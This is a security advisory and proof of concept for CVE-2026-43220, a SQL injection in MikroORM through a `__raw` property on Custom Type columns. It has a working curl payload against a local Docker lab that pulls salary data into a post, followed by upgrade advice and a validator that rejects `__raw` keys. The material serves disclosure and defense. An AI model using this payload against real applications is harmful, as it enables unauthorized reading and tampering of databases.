📄 MikroORM 7.0.5 SQL Injection

🗓️ 06 May 2026 00:00:00 · Reported by EQSTLab · Type: packetstorm
🔗 packetstorm.news

CVE-2026-43220: MikroORM SQL injection via __raw in Custom Type enables arbitrary SQL execution.

# CVE-2026-43220 MikroORM SQL Injection

★ CVE-2026-43220 MikroORM SQL Injection PoC ★

https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1

# Overview
> **CVE-2026-43220** is a **SQL Injection** vulnerability in **MikroORM**, a widely used TypeScript/Node.js ORM framework.  
> When a user-supplied value containing a `__raw` property is passed to a **Custom Type column** without validation, MikroORM's `isRaw()` check identifies it as a trusted internal Raw SQL expression and inserts the attacker-controlled `sql` value directly into the generated query without type conversion or sanitization, causing **unintended execution of arbitrary SQL**.

# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** |
| **Patched** | MikroORM **6.4.4** & **7.0.6** |

# Impact
- Exfiltration of sensitive data from the database without authorization
- Corruption or unintended modification of existing database records

# Environment
```bash
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
```

# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.

## Step 1. Send a request with a malicious payload containing `__raw`
Send a JSON body that includes a `__raw` property targeting a Custom Type column.
```bash
curl -X POST http://localhost:3000/write \
  -H "Content-Type: application/json" \
  -d '{
    "author":"x",
    "title":"x",
    "content": {
      "__raw": true,
      "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
    }
  }'
```

## Step 2. Check the HTTP response
Verify that the API returns a successful response without any error, indicating that MikroORM accepted the malicious payload as a valid value.

## Step 3. Confirm sensitive data is exfiltrated into post content
Verify that the `content` field of the created post contains the query result from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`), confirming that data from an unrelated table has been silently embedded into the response without any error or access control violation.

# Mitigation
- Upgrade to a patched release (**MikroORM 6.4.4** for 6.x, **7.0.6** for 7.x) or later; the fix adds origin verification in `isRaw()` so that externally supplied `__raw` properties are rejected
- Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to the ORM layer
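As an added example for the whitelist mitigation above (written for this page, not code from the advisory or from MikroORM), the validator below allow-lists the top-level properties of the `/write` body and rejects a `__raw` key at any depth, including inside nested arrays, before the value can reach a Custom Type column. The endpoint name and the `author`/`title`/`content` schema are assumptions taken from the PoC request.

```javascript
// Added example for this page, not code from the advisory or from MikroORM.
// Allow-list validation of the /write body before it reaches the ORM: unknown
// top-level properties and a `__raw` key at any depth are rejected.
// Hypothetical schema of the /write endpoint, assumed from the PoC request.
const POST_SCHEMA = {
  author: 'string',
  title: 'string',
  content: 'object', // Custom Type (JSON) column: nested user data is allowed here
};
const FORBIDDEN_KEY = '__raw'; // the property the advisory identifies as the trigger

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Depth-first scan; returns the JSON path of the first forbidden key, or null.
function findForbiddenKey(value, path = '$') {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findForbiddenKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
  } else if (isPlainObject(value)) {
    for (const key of Object.keys(value)) {
      if (key === FORBIDDEN_KEY) return `${path}.${key}`;
      const hit = findForbiddenKey(value[key], `${path}.${key}`);
      if (hit) return hit;
    }
  }
  return null;
}

// Returns { ok: true, value } only when every property is on the allow-list with
// the right type and no `__raw` key exists anywhere; otherwise { ok: false, errors }.
function validatePostBody(body) {
  if (!isPlainObject(body)) return { ok: false, errors: ['body must be a JSON object'] };
  const errors = [];
  for (const key of Object.keys(body)) {
    if (!Object.prototype.hasOwnProperty.call(POST_SCHEMA, key)) errors.push(`unexpected property: ${key}`);
  }
  for (const [key, type] of Object.entries(POST_SCHEMA)) {
    const ok = type === 'object' ? isPlainObject(body[key]) : typeof body[key] === type;
    if (!ok) errors.push(`${key} must be ${type}`);
  }
  const hit = findForbiddenKey(body);
  if (hit) errors.push(`forbidden key at ${hit}`);
  return errors.length ? { ok: false, errors } : { ok: true, value: body };
}
```

Run `validatePostBody(JSON.parse(req.body))` in the request handler and only hand `value` to the ORM when `ok` is true; the `errors` array gives a safe, specific message for the 400 response and for logging.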

# Analysis
- KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
- EN:

Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 5.5
EPSS: 0.00023